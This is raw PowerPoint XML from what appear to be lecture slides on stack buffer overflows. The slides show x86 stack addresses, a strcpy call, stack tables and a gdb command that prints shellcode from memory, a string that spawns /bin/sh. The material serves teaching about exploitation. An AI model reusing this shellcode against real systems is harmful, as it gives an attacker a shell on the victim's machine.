                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4765239" y="279814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5" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff660</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff666</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189889829"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff87b</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff666</a:t>
                      </a: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217</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="449977512"/>
              </p:ext>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0xbffff666</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0xbffff65c</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0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048415</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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048409</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048412</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048415</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff698</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="635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solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2946820" y="338066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0xbffff65c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2940826" y="3038035"/>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0xbffff660</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2964404" y="25559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0xbffff666</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Right Arrow 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4747670" y="305359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 name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4224759" y="4641448"/>
            <a:ext cx="4838218" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xbffff87b</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xbffff87b:	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1\300Phn/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>shh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\211\343PS\206\345\211\302\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\001̀1\300\260\001\061\333̀"</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429622602"/>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff87b</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff666</a:t>
                      </a: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218</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff69c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1577194284"/>
              </p:ext>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0xbffff666</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0xbffff65c</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0xbffff698</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>804841a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80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048400</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048403</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048406</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
